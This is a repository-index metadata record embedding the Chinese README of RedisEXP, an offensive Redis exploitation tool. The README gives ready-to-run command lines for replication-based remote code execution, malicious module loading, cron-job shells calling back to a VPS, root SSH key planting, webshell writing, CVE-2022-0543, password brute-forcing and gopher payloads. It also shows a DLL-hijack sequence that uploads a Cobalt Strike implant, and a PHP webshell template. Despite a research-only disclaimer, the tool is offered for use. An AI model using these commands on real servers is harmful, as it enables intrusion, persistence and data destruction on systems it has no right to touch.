{"id":13841933,"url":"https://github.com/yuyan-sec/RedisEXP","last_synced_at":"2025-07-11T13:33:09.893Z","repository":{"id":37384538,"uuid":"471722549","full_name":"yuyan-sec/RedisEXP","owner":"yuyan-sec","description":"Redis 漏洞利用工具","archived":false,"fork":false,"pushed_at":"2024-08-14T01:23:22.000Z","size":9546,"stargazers_count":750,"open_issues_count":0,"forks_count":102,"subscribers_count":12,"default_branch":"main","last_synced_at":"2024-08-14T14:49:12.206Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yuyan-sec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-19T14:41:00.000Z","updated_at":"2024-08-14T03:45:02.000Z","dependencies_parsed_at":"2024-08-10T14:26:34.912Z","dependency_job_id":"cd58eace-3eb2-495b-aae9-d3b66a36128b","html_url":"https://github.com/yuyan-sec/RedisEXP","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yuyan-sec%2FRedisEXP","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yuyan-sec%2FRedisEXP/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yuyan-sec%2FRedisEXP/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yuyan-sec%2FRedisEXP/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yuyan-sec","download_url":"https://codeload.github.com/yuyan-sec/RedisEXP/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225729754,"owners_count":17515159,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:24.385Z","updated_at":"2024-11-21T12:30:38.564Z","avatar_url":"https://github.com/yuyan-sec.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"## Redis 漏洞利用工具\n\n\n### 声明\n\n**本工具仅用于个人安全研究学习。由于传播、利用本工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，工具作者不为此承担任何责任。**\n\n------\n\n### 注意\n\n**主从复制会清空数据，主从复制会清空数据，主从复制会清空数据，请注意使用！请注意使用！请注意使用！**\n\n------\n\n**详细命令使用： `-h` 查看**\n\n\n```\n\n██████╗ ███████╗██████╗ ██╗███████╗    ███████╗██╗  ██╗██████╗\n██╔══██╗██╔════╝██╔══██╗██║██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗\n██████╔╝█████╗  ██║  ██║██║███████╗    █████╗   ╚███╔╝ ██████╔╝\n██╔══██╗██╔══╝  ██║  ██║██║╚════██║    ██╔══╝   ██╔██╗ ██╔═══╝\n██║  ██║███████╗██████╔╝██║███████║    ███████╗██╔╝ ██╗██║\n╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝\n\n基本连接: \nRedisExp.exe -r 192.168.19.1 -p 6379 -w 123456\n\n执行Redis命令：\nRedisExp.exe -m cli -r 192.168.19.1 -p 6379 -w 123456 -c info\n\n加载dll或so执行命令：\nRedisExp.exe -m load -r 目标IP -p 目标端口 -w 密码 -rf (目标 dll | so 文件名)\nRedisEXP.exe -m load -r 127.0.0.1 -p 6379 -rf exp.dll -n system -t system.exec\n\n主从复制命令执行：\nRedisExp.exe -m rce -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port [-c whoami 单次执行] -rf 目标文件名[exp.dll | exp.so (Linux)]\nRedisEXP.exe -m rce -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -c whoami\nRedisEXP.exe -m rce -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -c whoami -rf exp.so\n\n主从复制上传文件：\nRedisExp.exe -m upload -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port -rp 目标路径 -rf 目标文件名 -lf 本地文件\nRedisEXP.exe -m upload -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -rp . -rf 1.txt -lf .\\README.md\n\n主动关闭主从复制：\nRedisExp.exe -m close -r 目标IP -p 目标端口 -w 密码\n\n写计划任务：\nRedisExp.exe -m cron -r 目标IP -p 目标端口 -w 密码 -L VpsIP -P VpsPort\nRedisEXP.exe -m cron -r 192.168.1.8 -p 6379 -L 192.168.1.8 -P 9001\n\n写SSH 公钥：\nRedisExp.exe -m ssh -r 目标IP -p 目标端口 -w 密码 -u 用户名 -s 公钥\nRedisEXP.exe -m ssh -r 192.168.1.8 -p 6379 -u root -s ssh-aaaaaaaaaaaaaa\n\n写webshell：\nRedisExp.exe -m shell -r 目标IP -p 目标端口 -w 密码 -rp 目标路径 -rf 目标文件名 -s Webshell内容 [base64内容使用 -b 来解码]\nRedisEXP.exe -m shell -r 127.0.0.1 -p 6379 -rp . -rf shell.txt -s MTIzNA== -b\n\nCVE-2022-0543：\nRedisExp.exe -m cve -r 目标IP -p 目标端口 -w 密码 -c 执行命令\n\n爆破Redis密码：\nRedisExp.exe -m brute -r 目标IP -p 目标端口 -f 密码字典\nRedisEXP.exe -m brute -r 127.0.0.1 -p 6378 -f pass.txt\n\n生成gohper：\nRedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件\n\n执行 bgsave：\nRedisExp.exe -m bgsave -r 目标IP -p 目标端口 -w 密码\n\n判断文件（需要绝对路径）：\nRedisExp.exe -m dir -r 目标IP -p 目标端口 -w 密码 -rf c:\\windows\\win.ini\n\n```\n\n\n\n1. exp.dll 和 exp.so 来自 https://github.com/0671/RabR 已经把内容分别加载到 dll.go 和 so.go 可以直接调用。\n\n2. 在写入webshell的时候因为有一些特殊字符，可以使用把webshell进行 base64 编码，然后使用 -b 参数来解码\n\n3. **有空格的命令、目录或文件直接使用双引号即可 `\"ls /\"`**\n\n4. 关闭Redis压缩(写入乱码的时候可以关闭压缩，工具在写入shell的时候默认添加了关闭压缩，写入后再恢复开启压缩)\n\n   ```\n   config set rdbcompression no\n   ```\n\n   \n\n5. `stop-writes-on-bgsave-error` 默认为 `yes`, 如果 Redis 开启了 RDB 持久化并且最后一次失败了，Redis 默认会停止写入，让用户意识到数据的持久化没有正常工作。临时的解决方案是 `conf set stop-writes-on-bgsave-error` 设置为 no，只是让程序暂时忽略了这个问题，但是数据的持久化的问题并没有。（工具会默认设置为 `no` ，等工具退出的时候再重新设置回原来的值`yes`）\n\n   ```\n   config set stop-writes-on-bgsave-error no\n   ```\n\n   \n\n\n\n### dll 劫持\n\n利用dbghelp.dll：[https://github.com/P4r4d1se/dll_hijack](https://github.com/P4r4d1se/dll_hijack)\n\n```\n上传 cs 马\n.\\RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp c:\\users\\public -rf test.exe  -lf artifact.exe\n\n上传 dbghelp.dll 到 redis-server.exe 所在目录进行劫持\n.\\RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp . -rf dbghelp.dll  -lf dbghelp.dll\n\n触发dll劫持\n.\\RedisEXP.exe -m bgsave -r 127.0.0.1 -p 6378 -w 123456\n```\n\n\n\n### 生成gohper\n\n```\nRedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件\n```\n\n写shell模板\n\n```\nconfig set dir /tmp\nconfig set dbfilename shell.php\nset 'webshell' '\u003c?php phpinfo();?\u003e'\nbgsave\n```\n\n\n\n### 报错\n\n```\n工具报错：[ERR Error loading the extension. Please check the server logs.]        module load /tmp/exp.so\n\n服务端报错：Module /tmp/exp.so failed to load: It does not have execute permissions.\n```\n\n有可能是 Redis 版本太高， exp.so 没有执行权限导致加载不了。具体需要查看服务端的报错\n\n\n\n### 参考\n\n本工具基于大量优秀文章和工具才得以~~编写~~ 抄写完成，非常感谢这些无私的分享者！\n\n- https://github.com/zyylhn/redis_rce\n- https://github.com/0671/RabR\n- https://github.com/r35tart/RedisWriteFile\n- https://github.com/toalaska/redis_tool\n- https://yanghaoi.github.io/2021/10/09/redis-lou-dong-li-yong/\n- https://github.com/firebroo/sec_tools/tree/master/redis-over-gopher\n- [原创 Paper | Windows 与 Java 环境下的 Redis 利用分析](https://mp.weixin.qq.com/s/f7hPOoSSiRJpyMK51_Vxrw)\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyuyan-sec%2FRedisEXP","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyuyan-sec%2FRedisEXP","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyuyan-sec%2FRedisEXP/lists"}